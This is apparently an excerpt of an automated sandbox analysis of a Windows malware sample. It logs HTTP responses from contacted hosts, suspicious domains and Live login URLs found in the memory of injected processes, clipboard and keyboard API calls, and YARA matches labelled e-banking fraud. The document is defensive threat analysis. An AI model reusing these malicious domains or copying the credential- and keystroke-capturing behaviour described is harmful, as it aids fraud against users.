29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 
30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Content-Length: 1251Content-Type: text/htmlDate: Wed, 20 Nov 2024 08:23:45 GMTPragma: no-cacheConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 
30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 | Content-Length: 1251 | Content-Type: text/html | Date: Wed, 20 Nov 2024 08:23:48 GMT | Pragma: no-cache | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:08 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:10 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:13 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:16 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:21 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vytrQtgBdKwlAlT9EYzT6Cw0%2Bc%2Br1ZLd27pvzb2SIoHrqxxbiEO3QCFY%2B%2F7iaBU1AvcHHEVQG0JX5Sj2G9vAXeT%2B9QqALCXjCErxAhthD%2FAtUv7qKLrqAhCoiZj1hKVEP%2BXtC9RoPMnfLEM%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e570b0f6d3d0c94-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1451&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 14
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:24 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jK6GRdkqr0V%2FcubRNuuDf7if%2BJagemLfpk3Qgir8VQFqkKxNWsRpTkr2sVxR0BKNkIvwM6iXmkHDZzjG3b2zNx6AZTjCDN%2FqEnKG6VD2q0FjuHfJOqnR4R%2BH2NwreTuYE7iXNUSPQV%2BfxE4%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e570b1f2af441c3-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2051&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 14
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:26 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJxT0vs2sBoFq%2F3eft%2B6AfUPnysfAHJBCvGAXR80Koy0%2FbrZY2434rmA6GFJH8WqJtN6e0WLb3X77yochaZp35cAK3bRae%2BiD9qgDPT0O0bVo1%2BAyiS%2F6MHwQbmTmFv6m5vgjmGzxp8KcMw%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e570b2f39057c82-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1787&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1808&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 140
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:29 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYIazJ6H8qLVrGgl05NVc8nJBB6mtPopQ03p%2FT4WiLATGV9QSZHnsehaMr7VOY2Z2HjM8TrPtHwV%2FXP3s4RW1I%2FyIkJuJlAVLl3LNlGUf5uByvMkC8y4tVRUWI235p7r3x%2FzK3b8AzjoKyo%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e570b3f3ba8729f-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:49 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:51 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:54 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:24:56 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:25:02 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Wed, 20 Nov 2024 08:25:02 GMT | Vary: Accept-Encoding | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20QctgtnUAu12sMW441BhxUscYiFWId6jrw%2F66N3kmYCsDXASlFClJyBMlF7pf0I%2FTj3Bn%2FK%2FnoDT6QXP%2B8siTxSUIfJF4n5gLj9rzFjKD%2FHzzT9RbzkXaPP6bTu8JoBh8eZ9raDSg8%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e570c0ec82e42bd-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:25:05 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Wed, 20 Nov 2024 08:25:05 GMT | Vary: Accept-Encoding | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEryPHZFxfvqARwhFeSZQfE%2Bc5NVrs7g2mM%2FkI7FTYHvfnY0KYQI31TV4aszXfbQ4WPOWoJWlu0pn56tLwUyOsw6z9kV%2Bj60sC5jhyBpsqHoJaIblw0smN2Il9D7ESn5u01t3Ot6Hak%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e570c1ebf881a03-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:25:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Wed, 20 Nov 2024 08:25:07 GMT | Vary: Accept-Encoding | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9r5o9D6kHiNolSFOI8NMqmiLcZAVT8i1n5j3VEBjxvcB9aCGr6gLJLwKizHcMYvwW2vEv68nKJERP1VCYJdvWudnKmWR0FSbsqmQhDnQO3rxzb07wmZ%2F422und0avyehxa%2Ff1fa0Q38%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e570c2e9c9a42d1-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1688&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1799&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 20 Nov 2024 08:25:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Wed, 20 Nov 2024 08:25:10 GMT | Vary: Accept-Encoding | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=luQuSe9vfCf9yA13%2ByaiBmn4CT9%2BFx5a6QiVowTbU6dtGWae%2BHnff8NXMJH9UR8eK3YlvjKD4lf6xEe4BqCbEuBoT%2FpIdHQtLGUFz7mAnihq99gnN0msim%2BEChEMokloYcP9vMXh1q4%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e570c3eae16440d-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=498&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Wed, 20 Nov 2024 08:25:17 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Wed, 20 Nov 2024 08:25:20 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Wed, 20 Nov 2024 08:25:22 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: zJGHFZpQDL.exe, 00000009.00000002.3131138704.00000000062F8000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.0000000003B38000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: zJGHFZpQDL.exe, 00000009.00000002.3132931690.00000000080DE000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dating-apps-az-dn5.xyz
                Source: zJGHFZpQDL.exe, 00000009.00000002.3132931690.00000000080DE000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.dating-apps-az-dn5.xyz/pn0u/
                Source: zJGHFZpQDL.exe, 00000009.00000002.3131138704.000000000661C000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.0000000003E5C000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732091041.9737598049&other_args=eyJ1cmkiOiAiLzBnaX
                Source: winrs.exe, 0000000A.00000002.3125614806.0000000003E5C000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www70.earbudsstore.shop/
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: zJGHFZpQDL.exe, 00000009.00000002.3131138704.0000000006F88000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.00000000047C8000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3127930198.0000000005E00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: winrs.exe, 0000000A.00000002.3122304267.000000000086B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winrs.exe, 0000000A.00000002.3122304267.000000000086B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winrs.exe, 0000000A.00000002.3122304267.000000000086B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: winrs.exe, 0000000A.00000002.3122304267.0000000000846000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: winrs.exe, 0000000A.00000002.3122304267.000000000086B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winrs.exe, 0000000A.00000002.3122304267.0000000000846000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winrs.exe, 0000000A.00000003.1577119462.00000000078DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: zJGHFZpQDL.exe, 00000009.00000002.3131138704.0000000005FD4000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.0000000003814000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1691083286.0000000037E24000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://zkdamdjj.shop/vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00946B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00946B0C
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00946D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00946D07
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00932B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00932B37
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0095F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0095F7FF

                E-Banking Fraud

                Source: Yara match | File source: 8.2.svchost.exe.24b0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.svchost.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
